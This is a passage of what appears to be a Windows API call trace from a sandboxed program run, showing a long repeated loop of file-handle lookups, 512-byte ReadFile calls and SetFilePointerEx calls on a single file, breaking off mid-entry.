1 [0107.607] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.607] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: 